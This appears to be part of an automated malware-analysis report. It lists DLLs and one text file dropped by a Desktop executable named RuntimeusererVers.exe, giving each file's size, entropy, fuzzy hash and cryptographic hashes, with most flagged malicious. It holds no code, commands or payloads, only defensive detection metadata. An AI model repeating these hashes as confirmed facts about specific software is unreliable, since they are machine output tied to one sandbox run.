                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):253200
                                                                                                                                                                                                                                        Entropy (8bit):6.559097478184273
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:7t9gXW32tb0yf6CgLp+E4YECs5wxvj9qWM53pLW1Apw9tBg2YAp:7ngXW3wgyCiE4texvGI4Ap
                                                                                                                                                                                                                                        MD5:65B4AB77D6C6231C145D3E20E7073F51
                                                                                                                                                                                                                                        SHA1:23D5CE68ED6AA8EAABE3366D2DD04E89D248328E
                                                                                                                                                                                                                                        SHA-256:93EB9D1859EDCA1C29594491863BF3D72AF70B9A4240E0D9DD171F668F4F8614
                                                                                                                                                                                                                                        SHA-512:28023446E5AC90E9E618673C879CA46F598A62FBB9E69EF925DB334AD9CB1544916CAF81E2ECDC26B75964DCEDBA4AD4DE1BA2C42FB838D0DF504D963FCF17EE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65304
                                                                                                                                                                                                                                        Entropy (8bit):6.222786912280051
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6TO+CPN/pV8ETeERZX/fchw/IpBIPOIVQ7SygPx:mClZZow/IpBIPOIVQyx
                                                                                                                                                                                                                                        MD5:4255C44DC64F11F32C961BF275AAB3A2
                                                                                                                                                                                                                                        SHA1:C1631B2821A7E8A1783ECFE9A14DB453BE54C30A
                                                                                                                                                                                                                                        SHA-256:E557873D5AD59FD6BD29D0F801AD0651DBB8D9AC21545DEFE508089E92A15E29
                                                                                                                                                                                                                                        SHA-512:7D3A306755A123B246F31994CD812E7922943CDBBC9DB5A6E4D3372EA434A635FFD3945B5D2046DE669E7983EF2845BD007A441D09CFE05CF346523C12BDAD52
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):158992
                                                                                                                                                                                                                                        Entropy (8bit):6.8491146526380025
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:A4lirS97HrdVmEkGCm5hAznf49mNo2NOvJ02pIPZ1wBExN:VlirG0EkTVAYO2NQ3w
                                                                                                                                                                                                                                        MD5:E5ABC3A72996F8FDE0BCF709E6577D9D
                                                                                                                                                                                                                                        SHA1:15770BDCD06E171F0B868C803B8CF33A8581EDD3
                                                                                                                                                                                                                                        SHA-256:1796038480754A680F33A4E37C8B5673CC86C49281A287DC0C5CAE984D0CB4BB
                                                                                                                                                                                                                                        SHA-512:B347474DC071F2857E1E16965B43DB6518E35915B8168BDEFF1EAD4DFF710A1CC9F04CA0CED23A6DE40D717EEA375EEDB0BF3714DAF35DE6A77F071DB33DFAE6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):34584
                                                                                                                                                                                                                                        Entropy (8bit):6.4080285175428715
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:aHI6RwgJ5xe3Sc88GnJ8xIPWtpu5YiSyvDIqPxWEu:CIoJ5U3Sc88GJ8xIPWtpE7SyMqPx
                                                                                                                                                                                                                                        MD5:827439C35A0CEE0DE6421AF039CA7FF9
                                                                                                                                                                                                                                        SHA1:E7FDC4624C3D4380E527EE6997D4EBDEEC353EEA
                                                                                                                                                                                                                                        SHA-256:B86E19E57A415AE9D65D4C0A86658DE2D2AD6A97617CB514A105449C9B679D89
                                                                                                                                                                                                                                        SHA-512:92F2344253ECCF24CAFDA8F5559E2FA4C21D5B0889540139278032491596EC0AC743B18D4074AE12CB15060EDFED14B243A37B23434E7B2F15998FADDA3D15F3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):50968
                                                                                                                                                                                                                                        Entropy (8bit):6.432736275046285
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:gwFMCcP4W1vqJiR5RMWlpX4Ju6r2VIPXtz5YiSyvbPxWEuw:ZFMiJifKJulVIPXt97SyjPx9
                                                                                                                                                                                                                                        MD5:E5ACEAF21E82253E300C0B78793887A8
                                                                                                                                                                                                                                        SHA1:C58F78FBBE8713CB00CCDFEB1D8D7359F58EBFDE
                                                                                                                                                                                                                                        SHA-256:D950342686C959056FF43C9E5127554760FA20669D97166927DD6AAE5494E02A
                                                                                                                                                                                                                                        SHA-512:517C29928D6623CF3B2BCDCD68551070D2894874893C0D115A0172D749B6FE102AF6261C0FD1B65664F742FA96ABBCE2F8111A72E1A3C2F574B58B909205937F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32528
                                                                                                                                                                                                                                        Entropy (8bit):6.448063770045404
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:AuCvO+MZFryl9SDCP6rXv+mkWsniRq9IPQUkHQIYiSy1pCQqIPxh8E9VF0NykOBw:1+yF+6rX2mk599IPQUO5YiSyv3PxWEun
                                                                                                                                                                                                                                        MD5:F00133F7758627A15F2D98C034CF1657
                                                                                                                                                                                                                                        SHA1:2F5F54EDA4634052F5BE24C560154AF6647EEE05
                                                                                                                                                                                                                                        SHA-256:35609869EDC57D806925EC52CCA9BC5A035E30D5F40549647D4DA6D7983F8659
                                                                                                                                                                                                                                        SHA-512:1C77DD811D2184BEEDF3C553C3F4DA2144B75C6518543F98C630C59CD597FCBF6FD22CFBB0A7B9EA2FDB7983FF69D0D99E8201F4E84A0629BC5733AA09FFC201
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):79640
                                                                                                                                                                                                                                        Entropy (8bit):6.290841920161528
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:0JltpedXL+3ujz9/s+S+pzpMoiyivViaE9IPLwj7SyZPx:07tp4i3ujz9/sT+pzqoavVpE9IPLwjHx
                                                                                                                                                                                                                                        MD5:1EEA9568D6FDEF29B9963783827F5867
                                                                                                                                                                                                                                        SHA1:A17760365094966220661AD87E57EFE09CD85B84
                                                                                                                                                                                                                                        SHA-256:74181072392A3727049EA3681FE9E59516373809CED53E08F6DA7C496B76E117
                                                                                                                                                                                                                                        SHA-512:D9443B70FCDC4D0EA1CB93A88325012D3F99DB88C36393A7DED6D04F590E582F7F1640D8B153FE3C5342FA93802A8374F03F6CD37DD40CDBB5ADE2E07FAD1E09
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):120080
                                                                                                                                                                                                                                        Entropy (8bit):6.255942152365855
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:eZ1UnKJVckfKr0in6CL1F4TSlNdtAhfw5ymJSoEQ6MV4KUq8BIPOQXxxp:ecnoVckfjab5kQ6FPC
                                                                                                                                                                                                                                        MD5:D7B9ED5F37519B68750ECB5DEFB8E957
                                                                                                                                                                                                                                        SHA1:661CF73707E02D2837F914ADC149B61A120DDA7D
                                                                                                                                                                                                                                        SHA-256:2CE63E16DF518AE178DE0940505FF1B11DA97A5B175FE2A0D355B2EE351C55FD
                                                                                                                                                                                                                                        SHA-512:F04708C28FEB54F355D977E462245B183A0B50F4DB6926C767E8F1499E83E910B05A3023B84D398FB5DD87743FE6146DBBC3E1CAAED5351C27396F16746C6D6B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):161040
                                                                                                                                                                                                                                        Entropy (8bit):6.029728458381984
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:LMaGbIQQbN9W3PiNGeA66l8rBk3xA87xfCA+nbUtFMsVjTNbEzc+pIPC7ODxd:LMaG0bN96oG1l8YA8ZMSR+E
                                                                                                                                                                                                                                        MD5:208B0108172E59542260934A2E7CFA85
                                                                                                                                                                                                                                        SHA1:1D7FFB1B1754B97448EB41E686C0C79194D2AB3A
                                                                                                                                                                                                                                        SHA-256:5160500474EC95D4F3AF7E467CC70CB37BEC1D12545F0299AAB6D69CEA106C69
                                                                                                                                                                                                                                        SHA-512:41ABF6DEAB0F6C048967CA6060C337067F9F8125529925971BE86681EC0D3592C72B9CC85DD8BDEE5DD3E4E69E3BB629710D2D641078D5618B4F55B8A60CC69D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25360
                                                                                                                                                                                                                                        Entropy (8bit):6.6307231018245325
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:SR9ZfwFpEWE6ivQpIPZwGjHQIYiSy1pCQKzmPxh8E9VF0NyptVQcM:SRvqpEM4QpIPZw65YiSyvamPxWE3PS
                                                                                                                                                                                                                                        MD5:46E9D7B5D9668C9DB5CAA48782CA71BA
                                                                                                                                                                                                                                        SHA1:6BBC83A542053991B57F431DD377940418848131
                                                                                                                                                                                                                                        SHA-256:F6063622C0A0A34468679413D1B18D1F3BE67E747696AB972361FAED4B8D6735
                                                                                                                                                                                                                                        SHA-512:C5B171EBDB51B1755281C3180B30E88796DB8AA96073489613DAB96B6959A205846711187266A0BA30782102CE14FBFA4D9F413A2C018494597600482329EBF7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):37888
                                                                                                                                                                                                                                        Entropy (8bit):5.536883608844324
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:wQm5druFG/nDOnnvM7+gu305jTbEsU4qtp3/G0mTtAeSUhCE3umLUn0qQlwwHQoY:W58OSE7Gs+D/xmTllQFqLgM6/0
                                                                                                                                                                                                                                        MD5:4B5DCC46170E4AC810A59CA5B7533462
                                                                                                                                                                                                                                        SHA1:1EACF60FDFD427909B54F83518612A4638930225
                                                                                                                                                                                                                                        SHA-256:704CDCFCA773AC658B8F84335F29630707C216F739F7FA5970B1BE57F13A5B82
                                                                                                                                                                                                                                        SHA-512:C2E5B9B40F267F375234BE9A562882FAA1A0E82F32A951233464D27879D0B1620099BB800DE3E96BE277BB3BB44FF421A98A2F0C125F28652C2B6415D0FB4DEA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):207872
                                                                                                                                                                                                                                        Entropy (8bit):6.104353771977755
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Q1Krrzce1C8X3N/2AZXIQ+FvcSpOXelJfNgDdZgFqrrP:nrzxjXRhAQehgDdiFGr
                                                                                                                                                                                                                                        MD5:A7B4711C5BA1866745485ABE14101AC7
                                                                                                                                                                                                                                        SHA1:C37158CBD0FE67F8ACD61596F63CF62BD2985431
                                                                                                                                                                                                                                        SHA-256:6688F3DD5B7EFA8008C5BA776F32CECF5B42887B1B9EE21555AE3E0D4F13D2E0
                                                                                                                                                                                                                                        SHA-512:F952AD3C21B649E13E64540713A61DB6D49B394CA5D62ADD7A5FEC2186A8D27131BA038D449561B77670D3DEB2358A8254E4E205EF20228E27B1EB8234D0E843
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):34816
                                                                                                                                                                                                                                        Entropy (8bit):5.620393374613542
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:zVFT6fGGeAoBw4L0Slb3KFHzZgnq/A5MnOty9+AetDHVsSWBDPMEYcAe9hNugNYU:zTG3hzuot+AAaLIEYclH+uLB3
                                                                                                                                                                                                                                        MD5:2F2A2B2343549E990419DF0977E3FAC9
                                                                                                                                                                                                                                        SHA1:5724B63E32BDA7D36285F79DC9AD57FC97BA5415
                                                                                                                                                                                                                                        SHA-256:9569B0B501A0235388D075BAA4C84E5D571169AC6CE3AE9220CDE31A5F208B94
                                                                                                                                                                                                                                        SHA-512:A1B99DCAF01666C3AB9755D55001F3A18344CD70C386CE1B2233B5C6B8248B59D95804B450F9EE9C2F51D6293C4E748B9347540AE3F247418A1673BBD6EF466A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24064
                                                                                                                                                                                                                                        Entropy (8bit):5.3682936455537416
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:/NyocbRskh0rtT4vl8823C0/FCvNeu71vWRt7ARlgTeVycRguvNOM7:4ocd5hpdWCc3YoIIM7
                                                                                                                                                                                                                                        MD5:AA40AC7A7D1D9A10DA426701EA49508D
                                                                                                                                                                                                                                        SHA1:BBD083535E20EA00BCC40DE7B9E625FF5C74851E
                                                                                                                                                                                                                                        SHA-256:B892CBAF1A5B363FB66768194CD4D466916E81981BCB63C2989277114A4B0C10
                                                                                                                                                                                                                                        SHA-512:EAF14159F5F1B70DCB5E6416804F306EC5F4C235ABF431A27BC421861117BE8C6EC5326C8C703C4C3764B771E5DBAC37E6B93AC05F9A632BC83788C476EED8E2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):301568
                                                                                                                                                                                                                                        Entropy (8bit):6.375720417060108
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:GSL1oP995ooVABNirLq0l/IzkQ37P6BdeAb6:Gh19NO7irLq0l/IzB37Pe6
                                                                                                                                                                                                                                        MD5:03EF5E8DA65667751E1FD3FA0C182D3E
                                                                                                                                                                                                                                        SHA1:4608D1EFCA23143006C1338DEDA144A2F3BB8A16
                                                                                                                                                                                                                                        SHA-256:3D1C66BDCB4FA0B8E917895E1B4D62EE14260EAA1BD6FE908877C47585EC6127
                                                                                                                                                                                                                                        SHA-512:C094A3DFBD863726524C56DAB2592B3513A3A8C445BCAAC6CFB41A5DDEC3079D9B1F849C6826C1CC4241CA8B0AA44E33D2502BB20856313966AF31F480BA8811
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):278952
                                                                                                                                                                                                                                        Entropy (8bit):6.049041164740881
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:QW1H/M8fRR0mNplkXCRrVADwYCuCigT/Q5MSRqNb7d86:QWN/TRLNLWCRrI55MWavdJ
                                                                                                                                                                                                                                        MD5:8D0619BFE30DEADF6F21196F0F8D53D3
                                                                                                                                                                                                                                        SHA1:E7ABD65A8CCAFEFF6CAF6A2FF98D27D24D87C9AD
                                                                                                                                                                                                                                        SHA-256:B301535DCA491D9814EA28FAA320AC7A19D0F5D94237996FA0A3B5A936432514
                                                                                                                                                                                                                                        SHA-512:5A88E4A06B98832AAA9BBB89E382F6C7E9B65C5ECBA48DE8F4FF1FA58BB06A74B9C2F6B2EC185C2A306CB0B5D68D0B28D74B323432A0B2953D8DFC29FED920D7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):10752
                                                                                                                                                                                                                                        Entropy (8bit):4.663205590455457
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:qlTp72HzA5iJewkY0hQMsQJCUCLsZEA4elh3XQMtCFNGioUjQcX6g8cim1qeSju1:ql12HzzjBbRYoesfoRcqgvimoe
                                                                                                                                                                                                                                        MD5:FA50D9F8BCE6BD13652F5090E7B82C4D
                                                                                                                                                                                                                                        SHA1:EE137DA302A43C2F46D4323E98FFD46D92CF4BEF
                                                                                                                                                                                                                                        SHA-256:FFF69928DEA1432E0C7CB1225AB96F94FD38D5D852DE9A6BB8BF30B7D2BEDCEB
                                                                                                                                                                                                                                        SHA-512:341CEC015E74348EAB30D86EBB35C028519703006814A2ECD19B9FE5E6FCB05EDA6DDE0AAF4FE624D254B0D0180EC32ADF3B93EE96295F8F0F4C9D4ED27A7C0C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):115712
                                                                                                                                                                                                                                        Entropy (8bit):5.890497931382238
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:rKLwVA2epJbdfD3NTSGkzsvDNIWN4ZgibPq0kgIWgymA5TGK2MLVur:rKL/dhTMzsbNd9ibPavPA5TGK7Qr
                                                                                                                                                                                                                                        MD5:2D1F2FFD0FECF96A053043DAAD99A5DF
                                                                                                                                                                                                                                        SHA1:B03D5F889E55E802D3802D0F0CAA4D29C538406B
                                                                                                                                                                                                                                        SHA-256:207BBAE9DDF8BDD64E65A8D600FE1DD0465F2AFCD6DC6E28D4D55887CD6CBD13
                                                                                                                                                                                                                                        SHA-512:4F7D68F241A7F581E143A010C78113154072C63ADFF5F200EF67EB34D766D14CE872D53183EB2B96B1895AA9C8D4CA82EE5E61E1C5E655FF5BE56970BE9EBE3E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6673920
                                                                                                                                                                                                                                        Entropy (8bit):6.582002531606852
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:EzN+T+xtLlk0PPMAiGoTzeDy3x8lGBlWi9Nk:E5Y6Jk0PPMtfTzp3x8c
                                                                                                                                                                                                                                        MD5:486085AAC7BB246A173CEEA0879230AF
                                                                                                                                                                                                                                        SHA1:EF1095843B2A9C6D8285C7D9E8E334A9CE812FAE
                                                                                                                                                                                                                                        SHA-256:C3964FC08E4CA8BC193F131DEF6CC4B4724B18073AA0E12FED8B87C2E627DC83
                                                                                                                                                                                                                                        SHA-512:8A56774A08DA0AB9DD561D21FEBEEBC23A5DEA6F63D5638EA1B608CD923B857DF1F096262865E6EBD56B13EFD3BBA8D714FFDCE8316293229974532C49136460
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51712
                                                                                                                                                                                                                                        Entropy (8bit):5.664902275560485
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:cXkHpFLJOXgD7JKgegsvC1wryTXkHjQwDchoPWmzDD/:cXkH/Qswge1WwryTXk8mchoPWmz
                                                                                                                                                                                                                                        MD5:34C2DD52C9E920E035444D6CBDDEB555
                                                                                                                                                                                                                                        SHA1:3FF99987B968261E88032652917F137D4A6A0493
                                                                                                                                                                                                                                        SHA-256:55814D323EE1EC6CD6145AE8F43DBF44D9481E3592AA17B5A17010F7E401FF42
                                                                                                                                                                                                                                        SHA-512:8F0BE0A3E2588BDEFF9F5C4EB728AE43A58A19B91596ADCA0C931D5425A591178F13DCEF68B1B949A2C805E1B9963800397F661688FD3C299D7084EFE45ADAF7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3445016
                                                                                                                                                                                                                                        Entropy (8bit):6.099467326309974
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:+/+YgEQaGDoWS04ki7x+QRsZ51CPwDv3uFfJx:MLgEXGUZ37x+VZ51CPwDv3uFfJx
                                                                                                                                                                                                                                        MD5:E94733523BCD9A1FB6AC47E10A267287
                                                                                                                                                                                                                                        SHA1:94033B405386D04C75FFE6A424B9814B75C608AC
                                                                                                                                                                                                                                        SHA-256:F20EB4EFD8647B5273FDAAFCEB8CCB2B8BA5329665878E01986CBFC1E6832C44
                                                                                                                                                                                                                                        SHA-512:07DD0EB86498497E693DA0F9DD08DE5B7B09052A2D6754CFBC2AA260E7F56790E6C0A968875F7803CB735609B1E9B9C91A91B84913059C561BFFED5AB2CBB29F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):39696
                                                                                                                                                                                                                                        Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                        MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                        SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                        SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                        SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):704792
                                                                                                                                                                                                                                        Entropy (8bit):5.55753143710539
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:ihO7/rNKmrouK/POt6h+7ToRLgo479dQwwLOpWW/dQ0T9qwfU2lvzA:iis/POtrzbLp5dQ0T9qcU2lvzA
                                                                                                                                                                                                                                        MD5:25BDE25D332383D1228B2E66A4CB9F3E
                                                                                                                                                                                                                                        SHA1:CD5B9C3DD6AAB470D445E3956708A324E93A9160
                                                                                                                                                                                                                                        SHA-256:C8F7237E7040A73C2BEA567ACC9CEC373AADD48654AAAC6122416E160F08CA13
                                                                                                                                                                                                                                        SHA-512:CA2F2139BB456799C9F98EF8D89FD7C09D1972FA5DD8FC01B14B7AF00BF8D2C2175FB2C0C41E49A6DAF540E67943AAD338E33C1556FD6040EF06E0F25BFA88FA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):46592
                                                                                                                                                                                                                                        Entropy (8bit):5.344765898080963
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:i005Gi4zzWerZi5s+AP6tzPVtLZ9rthfBie/4jejOcmKnNrODgYMjtNtnlsht6oR:thWu6tVlBiIjnVOIjbMrYyeW
                                                                                                                                                                                                                                        MD5:B92F8EFB672C383AB60B971B3C6C87DE
                                                                                                                                                                                                                                        SHA1:ACB671089A01D7F1DB235719C52E6265DA0F708F
                                                                                                                                                                                                                                        SHA-256:B7376B5D729115A06B1CAB60B251DF3EFC3051EBBA31524EA82F0B8DB5A49A72
                                                                                                                                                                                                                                        SHA-512:680663D6C6CD7B9D63160C282F6D38724BD8B8144D15F430B28B417DDA0222BFFF7AFEFCB671E863D1B4002B154804B1C8AF2D8A28FFF11FA94972B207DF081B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):143360
                                                                                                                                                                                                                                        Entropy (8bit):6.075135460374895
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:yYjAONgTgGNWARNEBXRzHJ0Xg9sGkD7EKN7Jv1FL/49olpS0mZP0c:nlTmsCD7Z7Jv19/49olY0m10c
                                                                                                                                                                                                                                        MD5:E611E5C516FE1C3670353E3427DA42B9
                                                                                                                                                                                                                                        SHA1:A946ABDEEBE7FA9CCD7AB256C927BE5902784E4A
                                                                                                                                                                                                                                        SHA-256:B4F41659DC3002F70BC6578801AAD771B45F106103441D1E9B4C553C1E50C939
                                                                                                                                                                                                                                        SHA-512:A1C057DBD4B618FDFDD75F70BFE85DBFC6D2A25FED8E74DD5FBF950A02D7470E1F4BFAC8ED00A5CDEF6A68B8737A156A5A0EA443E826C6B30C94554BD7326B99
